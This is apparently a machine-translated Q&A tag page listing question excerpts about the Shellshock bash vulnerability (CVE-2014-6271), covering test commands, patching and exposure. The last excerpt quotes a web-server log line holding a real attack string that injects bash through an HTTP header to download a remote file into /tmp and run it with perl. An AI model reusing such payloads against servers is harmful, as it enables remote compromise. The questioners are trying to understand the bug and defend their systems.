shellshock-bash-bug

    2熱度

    1回答

    剛剛閱讀了這個潛在的嚴重Linux基礎錯誤。看起來Azure應該是安全的,因爲它基於Windows,並且很可能很快就會修補,因此我們使用平臺即服務(PAAS)。 對於任何人想知道這是怎麼一回事嘗試亨特在一個很好的文章:Troy Hunt's Article 任何意見,任何人這一點,或指針? 謝謝。

    2熱度

    1回答

    由於CVE-2014-6271的所有恐慌,我發現有關漏洞表面積的一些具體信息。特別是,個人是否需要終端訪問才能執行此漏洞利用?我知道調用到shell的CGI服務可以間接地提供對此漏洞的訪問(按照The bash vulnerability CVE-2014-6271 . Can it affect my CGI perl scripts? How to understand this?),但還存在

    1熱度

    2回答

    我運行的是非標準版本的Ubuntu,我試圖通過從源碼下載和重新編譯來修補shell震盪錯誤,遵循https://news.ycombinator.com/item?id=8364385的說明。在make install之後,運行bash --version顯示4.3.24(2)。但是在運行bug測試時: env var='() { :;}; echo vulnerable' bash -c /bi

    -6熱度

    1回答

    我最近遇到了shellshock bug,這是bash shell中的一個bug。它以某種方式使用env命令來創建包含函數的環境變量。當一個新的bash殼催生 $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 這些函數然後運行。我在很多地方閱讀,並得到了我剛剛寫的同樣的解釋。但是,我仍然無法確定上述命令的運行以及

    2熱度

    1回答

    RedHat針對涉及預加載庫的Shellshock漏洞提供瞭解決方法。解決方法源代碼的URL位於bash_ld_preload.c。 但是解決方法的步驟似乎已經失蹤了。這是一個糟糕的解決方案還是無解決方案 的代碼: #include <sys/types.h> #include <stdlib.h> #include <string.h> static void __attribute__

    3熱度

    1回答

    我在理解下面的代碼時遇到了問題,這是Shell Shock'漏洞證明'代碼。 有人可以解釋給我嗎?特別地,這部分 「() { :;};」 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

    1熱度

    1回答

    我看過Shellshock是Heartbleed之後的另一個更大的漏洞。 代碼來測試我們的Bash殼很容易與否是: env X="() { :;} ; echo shellshock" /bin/sh -c "echo completed" 詳細,請問這個代碼完全工作?代碼env X="() { :;} ;是做什麼的? 如果我在一個Linux環境中託管一個網站,而這個網站的shell很脆弱,它

    0熱度

    1回答

    各種渠道以及蘋果公司都向OS X用戶保證,他們不會受到Shellshock bash漏洞利用的特別威脅。然而,我經常在我的系統上使用Python,並想知道這是否會增加我的風險;以及是否有任何事情可以緩解它(短缺安裝不同的bash)。 我在OS X 10.9.5上使用Apple的(2.7.5)Python和bash。

    19熱度

    1回答

    如何修復Debian 6.0(Squeeze)上的ShellshockBash漏洞?

    1熱度

    3回答

    我看到下面的行/var/log/apache2/access_log下: "GET /cgi-bin/hi HTTP/1.0" 404 357 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jur